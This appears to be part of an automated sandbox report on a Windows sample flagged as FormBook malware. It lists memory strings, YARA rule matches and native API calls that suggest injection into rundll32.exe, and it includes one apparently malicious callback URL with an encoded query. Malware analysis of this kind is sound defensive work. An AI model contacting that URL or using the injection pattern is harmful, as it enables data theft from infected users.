          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.233791892.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: rundll32.exe, 00000006.00000002.483040430.0000000004C92000.00000004.00000001.sdmpString found in binary or memory: https://www.plaisterpress.com/uoe8/?Dnh8=ntdwrTRF9WA24Nqdf4NJYZb1FUQAWBN8mHVjFMye2D4j4jK3D0IQWYm/ipt
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404EA0

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_004181B0 NtCreateFile,1_2_004181B0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00418260 NtReadFile,1_2_00418260
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_004182E0 NtClose,1_2_004182E0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00418390 NtAllocateVirtualMemory,1_2_00418390
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041825A NtReadFile,1_2_0041825A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_004182DA NtClose,1_2_004182DA
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041838B NtAllocateVirtualMemory,1_2_0041838B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A498F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00A498F0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00A49860
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49840 NtDelayExecution,LdrInitializeThunk,1_2_00A49840
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A499A0 NtCreateSection,LdrInitializeThunk,1_2_00A499A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00A49910
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49A20 NtResumeThread,LdrInitializeThunk,1_2_00A49A20
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00A49A00
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49A50 NtCreateFile,LdrInitializeThunk,1_2_00A49A50
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A495D0 NtClose,LdrInitializeThunk,1_2_00A495D0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49540 NtReadFile,LdrInitializeThunk,1_2_00A49540
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A496E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00A496E0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00A49660
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A497A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00A497A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49780 NtMapViewOfSection,LdrInitializeThunk,1_2_00A49780
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49FE0 NtCreateMutant,LdrInitializeThunk,1_2_00A49FE0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49710 NtQueryInformationToken,LdrInitializeThunk,1_2_00A49710
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A498A0 NtWriteVirtualMemory,1_2_00A498A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49820 NtEnumerateKey,1_2_00A49820
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A4B040 NtSuspendThread,1_2_00A4B040
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A499D0 NtCreateProcessEx,1_2_00A499D0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49950 NtQueueApcThread,1_2_00A49950
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49A80 NtOpenDirectoryObject,1_2_00A49A80
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49A10 NtQuerySection,1_2_00A49A10
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A4A3B0 NtGetContextThread,1_2_00A4A3B0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49B00 NtSetValueKey,1_2_00A49B00
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A495F0 NtQueryInformationFile,1_2_00A495F0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49520 NtWaitForSingleObject,1_2_00A49520
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A4AD30 NtSetContextThread,1_2_00A4AD30
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49560 NtWriteFile,1_2_00A49560
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A496D0 NtCreateKey,1_2_00A496D0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49610 NtEnumerateValueKey,1_2_00A49610
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49670 NtQueryInformationProcess,1_2_00A49670
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49650 NtQueryValueKey,1_2_00A49650
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49730 NtQueryVirtualMemory,1_2_00A49730
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A4A710 NtOpenProcessToken,1_2_00A4A710
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49760 NtOpenProcess,1_2_00A49760
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A49770 NtSetInformationFile,1_2_00A49770
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A4A770 NtOpenThread,1_2_00A4A770
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_004181B0 NtCreateFile,1_1_004181B0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_00418260 NtReadFile,1_1_00418260
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_004182E0 NtClose,1_1_004182E0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_00418390 NtAllocateVirtualMemory,1_1_00418390
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041825A NtReadFile,1_1_0041825A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_004182DA NtClose,1_1_004182DA
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041838B NtAllocateVirtualMemory,1_1_0041838B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649540 NtReadFile,LdrInitializeThunk,6_2_04649540
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046495D0 NtClose,LdrInitializeThunk,6_2_046495D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04649660
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649650 NtQueryValueKey,LdrInitializeThunk,6_2_04649650
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046496E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_046496E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046496D0 NtCreateKey,LdrInitializeThunk,6_2_046496D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649710 NtQueryInformationToken,LdrInitializeThunk,6_2_04649710
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649FE0 NtCreateMutant,LdrInitializeThunk,6_2_04649FE0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649780 NtMapViewOfSection,LdrInitializeThunk,6_2_04649780
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649860 NtQuerySystemInformation,LdrInitializeThunk,6_2_04649860
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649840 NtDelayExecution,LdrInitializeThunk,6_2_04649840
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_04649910
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046499A0 NtCreateSection,LdrInitializeThunk,6_2_046499A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649A50 NtCreateFile,LdrInitializeThunk,6_2_04649A50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649560 NtWriteFile,6_2_04649560
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649520 NtWaitForSingleObject,6_2_04649520
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0464AD30 NtSetContextThread,6_2_0464AD30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046495F0 NtQueryInformationFile,6_2_046495F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649670 NtQueryInformationProcess,6_2_04649670
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649610 NtEnumerateValueKey,6_2_04649610
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649760 NtOpenProcess,6_2_04649760
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0464A770 NtOpenThread,6_2_0464A770
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649770 NtSetInformationFile,6_2_04649770
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649730 NtQueryVirtualMemory,6_2_04649730
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0464A710 NtOpenProcessToken,6_2_0464A710
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046497A0 NtUnmapViewOfSection,6_2_046497A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0464B040 NtSuspendThread,6_2_0464B040
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649820 NtEnumerateKey,6_2_04649820
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046498F0 NtReadVirtualMemory,6_2_046498F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046498A0 NtWriteVirtualMemory,6_2_046498A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649950 NtQueueApcThread,6_2_04649950
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046499D0 NtCreateProcessEx,6_2_046499D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649A20 NtResumeThread,6_2_04649A20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649A00 NtProtectVirtualMemory,6_2_04649A00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649A10 NtQuerySection,6_2_04649A10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649A80 NtOpenDirectoryObject,6_2_04649A80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04649B00 NtSetValueKey,6_2_04649B00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0464A3B0 NtGetContextThread,6_2_0464A3B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BB82E0 NtClose,6_2_02BB82E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BB8260 NtReadFile,6_2_02BB8260
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BB8390 NtAllocateVirtualMemory,6_2_02BB8390
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BB81B0 NtCreateFile,6_2_02BB81B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BB82DA NtClose,6_2_02BB82DA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BB825A NtReadFile,6_2_02BB825A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02BB838B NtAllocateVirtualMemory,6_2_02BB838B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040314A
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 0_2_004046A70_2_004046A7
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041B8B41_2_0041B8B4
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041C1CB1_2_0041C1CB
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_004012081_2_00401208
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041C3FC1_2_0041C3FC
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041CB991_2_0041CB99
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00408C4B1_2_00408C4B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00408C501_2_00408C50
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041C5441_2_0041C544
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_0041B6111_2_0041B611
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A320A01_2_00A320A0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD20A81_2_00AD20A8
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1B0901_2_00A1B090
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD28EC1_2_00AD28EC
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ADE8241_2_00ADE824
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC10021_2_00AC1002
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A241201_2_00A24120
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A0F9001_2_00A0F900
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD22AE1_2_00AD22AE
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ABFA2B1_2_00ABFA2B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A3EBB01_2_00A3EBB0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AC03DA1_2_00AC03DA
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACDBD21_2_00ACDBD2
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD2B281_2_00AD2B28
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1841F1_2_00A1841F
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACD4661_2_00ACD466
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A325811_2_00A32581
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A1D5E01_2_00A1D5E0
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD25DD1_2_00AD25DD
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A00D201_2_00A00D20
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD2D071_2_00AD2D07
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD1D551_2_00AD1D55
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD2EF71_2_00AD2EF7
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00A26E301_2_00A26E30
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ACD6161_2_00ACD616
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00AD1FF11_2_00AD1FF1
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_2_00ADDFCE1_2_00ADDFCE
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_004010301_1_00401030
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041B8B41_1_0041B8B4
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041C1CB1_1_0041C1CB
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_004012081_1_00401208
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041C3FC1_1_0041C3FC
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041CB991_1_0041CB99
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_00408C4B1_1_00408C4B
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_00408C501_1_00408C50
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041C5441_1_0041C544
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_00402D901_1_00402D90
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_0041B6111_1_0041B611
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exeCode function: 1_1_00402FB01_1_00402FB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CD4666_2_046CD466
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461841F6_2_0461841F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D1D556_2_046D1D55
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04600D206_2_04600D20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D2D076_2_046D2D07
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0461D5E06_2_0461D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D25DD6_2_046D25DD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046325816_2_04632581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04626E306_2_04626E30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046CD6166_2_046CD616
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D2EF76_2_046D2EF7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_046D1FF16_2_046D1FF1
